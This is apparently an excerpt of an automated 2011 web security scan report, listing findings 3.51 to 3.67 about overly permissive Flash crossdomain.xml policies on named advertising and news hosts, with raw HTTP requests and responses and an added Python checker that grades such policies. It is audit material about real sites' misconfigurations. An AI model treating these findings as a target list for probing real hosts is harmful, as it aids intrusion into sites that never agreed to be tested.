Content-Length: 170
Content-Type: text/xml
Last-Modified: Wed, 29 Dec 2010 22:37:57 GMT
Accept-Ranges: bytes
ETag: "ef855aa9a7cb1:55e"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:39:59 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.51. http://trc.taboolasyndication.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: trc.taboolasyndication.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:55 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 02 May 2011 19:38:04 GMT
ETag: "f406f8-199-4a250297d3f00"
Accept-Ranges: bytes
Content-Length: 409
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

3.52. http://usatoday1.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:51 GMT
Server: Omniture DC/2.0.0
xserver: www419
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

3.53. http://va.px.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 15:37:12 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.54. http://w10.localadbuy.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: w10.localadbuy.com

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:36:58 GMT
Content-Type: application/xml
Content-Length: 340
Last-Modified: Thu, 09 Dec 2010 18:13:51 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies=
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.55. http://widget.newsinc.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://widget.newsinc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: widget.newsinc.com

Response

HTTP/1.1 200 OK
x-amz-id-2: WG7y2gX1/96nanqwYADUuDtOwvrux+J3B/rD+BbX0FP48UXZR/sEjPQFKLyfXNhP
x-amz-request-id: 9337D374BAA52553
Date: Mon, 09 May 2011 15:37:39 GMT
Last-Modified: Mon, 26 Oct 2009 18:54:37 GMT
ETag: "9a2df4412dfbe178fccafc4915ad186e"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 335
Connection: keep-alive
Server: AmazonS3

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-polici
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.56. http://wvue.web.entriq.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wvue.web.entriq.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wvue.web.entriq.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:17 GMT
Server: Apache
X-Host: w3
Vary: Accept-Encoding
Cache-Control: max-age=60
Expires: Mon, 09 May 2011 15:38:17 GMT
Content-Length: 295
Keep-Alive: timeout=3
Connection: Keep-Alive
Content-Type: text/html

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.57. http://www.fox8live.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fox8live.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:54 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n23), rf-ht iad-agg-n23 ( origin)
ETag: "0b66c58755c71:0"
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:38:54 GMT
Age: 0
Content-Length: 121
Content-Type: text/xml
Last-Modified: Tue, 20 Feb 2007 15:54:04 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

3.58. http://www.groupon.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.groupon.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.65
Content-Type: text/xml
Accept-Ranges: bytes
Age: 258768
Date: Mon, 09 May 2011 15:35:34 GMT
Last-Modified: Thu, 18 Nov 2010 03:41:54 GMT
Content-Length: 352
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" to-ports="80,443" secure="false" />
...[SNIP]...

3.59. https://www.groupon.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain. This policy is served over HTTPS but sets secure="false" on its wildcard rule, so SWF content loaded over plain HTTP is also permitted to read responses from the HTTPS host, which removes the protection HTTPS would otherwise give the policy.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.groupon.com

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:35:57 GMT
Content-Type: text/xml
Connection: close
Accept-Ranges: bytes
Age: 225292
Last-Modified: Thu, 18 Nov 2010 03:10:16 GMT
Content-Length: 352

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" to-ports="80,443" secure="false" />
...[SNIP]...

3.60. http://xedge.aperture.displaymarketplace.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://xedge.aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: xedge.aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Content-Length: 268
Content-Type: text/xml
Content-Location: http://xedge.aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:ddb"
Server: Microsoft-IIS/6.0
X-Server: D2E.NJ-a.dm.com_x
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:37:52 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...

3.61. http://adadvisor.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:28 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 418
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...

3.62. http://ads.bridgetrack.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 810
Content-Type: text/html
Date: Mon, 09 May 2011 15:37:40 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="ads.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="ads.bri
...[SNIP]...
<allow-access-from domain="sec-ads.bridgetrack.com" />
   <allow-access-from domain="cms-ads.bridgetrack.com" />
   <allow-access-from domain="sec-cms-ads.bridgetrack.com" />
   <allow-access-from domain="travelerssaves.com" />
   <allow-access-from domain="moneyneedsattention.com" />
   <allow-access-from domain="www.moneyneedsattention.com"/>
   <allow-access-from domain="portal.kaplan.edu" />
   <allow-access-from domain="www.portal.kaplan.edu"/>
<allow-access-from domain="*.spongecell.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.myvolvo.com.au" secure="false" />
...[SNIP]...

3.63. http://content.usatoday.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT
Accept-Ranges: bytes
ETag: "befaf11117e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:38:09 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

3.64. http://contextweb.usatoday.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://contextweb.usatoday.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: contextweb.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:45 GMT
ETag: "8034251217e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:36:35 GMT
Content-Length: 1558
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...
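
The findings in this section grade each crossdomain.xml by its allow-access-from rules (High for domain="*", Low for wildcard or specific domains), but the scanner text does not call out three attributes visible in several of the responses above: secure="false" on an HTTPS policy, allow-http-request-headers-from domain="*", and site-control permitted-cross-domain-policies="all". The following checker, added here as an example and not part of the original report or of any vendor's tooling, applies the same grading and also reports those attributes. The sample policies are constructed to mirror the shapes seen in this report; the severity labels and the extra "Medium" tier are this example's own choices.

```python
"""Static checker for Flash crossdomain.xml policies (added example)."""
import xml.etree.ElementTree as ET

SEVERITY_RANK = {"None": 0, "Info": 1, "Low": 2, "Medium": 3, "High": 4}


def content_type_accepted(content_type):
    """Flash Player honours a policy served as any text/* type, application/xml
    or application/xhtml+xml, so the text/plain and text/html policies in this
    report are still enforced by the player."""
    mime = content_type.split(";", 1)[0].strip().lower()
    return mime.startswith("text/") or mime in ("application/xml", "application/xhtml+xml")


def _bump(current, new):
    return new if SEVERITY_RANK[new] > SEVERITY_RANK[current] else current


def audit_policy(xml_body, served_over_https=False):
    """Return (severity, findings) for one crossdomain.xml body.

    served_over_https: the secure attribute only has an effect on a policy
    fetched over HTTPS; on a plain-HTTP policy it is moot and not reported.
    """
    if isinstance(xml_body, str):
        xml_body = xml_body.encode("utf-8")
    # expat does not fetch the external DTD named in the DOCTYPE, so parsing
    # a policy that references the macromedia/adobe DTD stays offline.
    root = ET.fromstring(xml_body)
    if root.tag != "cross-domain-policy":
        raise ValueError("not a cross-domain-policy document")

    severity, findings = "None", []
    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*":
            severity = _bump(severity, "High")
            findings.append('allow-access-from domain="*": any origin can read responses')
        elif "*" in domain:
            severity = _bump(severity, "Low")
            findings.append(f"allow-access-from wildcard {domain}: every host matching it is trusted")
        elif domain:
            severity = _bump(severity, "Info")
            findings.append(f"allow-access-from specific host {domain}")
        # secure="False" (capitalised) appears in the wild, so compare case-insensitively.
        if served_over_https and el.get("secure", "true").lower() == "false":
            severity = _bump(severity, "High")
            findings.append(f'secure="false" for {domain}: SWFs loaded over plain HTTP may read this HTTPS host')

    for el in root.iter("allow-http-request-headers-from"):
        domain, headers = el.get("domain", ""), el.get("headers", "")
        if domain == "*":
            severity = _bump(severity, "Medium")
            findings.append(f'allow-http-request-headers-from domain="*" headers="{headers}": '
                            "any origin may send those headers to this host")

    site_control = root.find("site-control")
    if site_control is not None and \
            site_control.get("permitted-cross-domain-policies", "").lower() == "all":
        severity = _bump(severity, "Low")
        findings.append('site-control permitted-cross-domain-policies="all": '
                        "any file on the host can be loaded as a policy file")
    return severity, findings


# Constructed sample policies modelled on the response bodies in this report.
SAMPLE_OPEN = """<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>"""

SAMPLE_OPEN_HTTPS = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="80,443" secure="false" />
</cross-domain-policy>"""

SAMPLE_HEADERS = """<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

SAMPLE_SCOPED = """<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
   <allow-access-from domain="projects.usatoday.com"/>
</cross-domain-policy>"""

if __name__ == "__main__":
    for name, body, https in (("open", SAMPLE_OPEN, False),
                              ("open-https", SAMPLE_OPEN_HTTPS, True),
                              ("headers", SAMPLE_HEADERS, False),
                              ("scoped", SAMPLE_SCOPED, False)):
        sev, notes = audit_policy(body, served_over_https=https)
        print(f"{name}: {sev}")
        for note in notes:
            print("  -", note)
```

Run against a captured response body, the checker reproduces the High/Low split used in this section and adds the secure, request-header and site-control observations. The secure="false" check is deliberately gated on served_over_https, since a plain-HTTP policy gains nothing from secure="true" and the flag would otherwise be noise for most of the hosts listed here.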

3.65. http://data.usatoday.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://data.usatoday.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: data.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:48 GMT
Accept-Ranges: bytes
ETag: "069301417e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 1558
Date: Mon, 09 May 2011 15:37:58 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

3.66. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Mon, 09 May 2011 01:55:59 GMT
Expires: Tue, 10 May 2011 01:55:59 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 49166
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.67. http://i.usatoday.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://i.usatoday.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:48 GMT
Accept-Ranges: bytes
ETag: "069301417e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 1558
Date: Mon, 09 May 2011 15:36:39 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
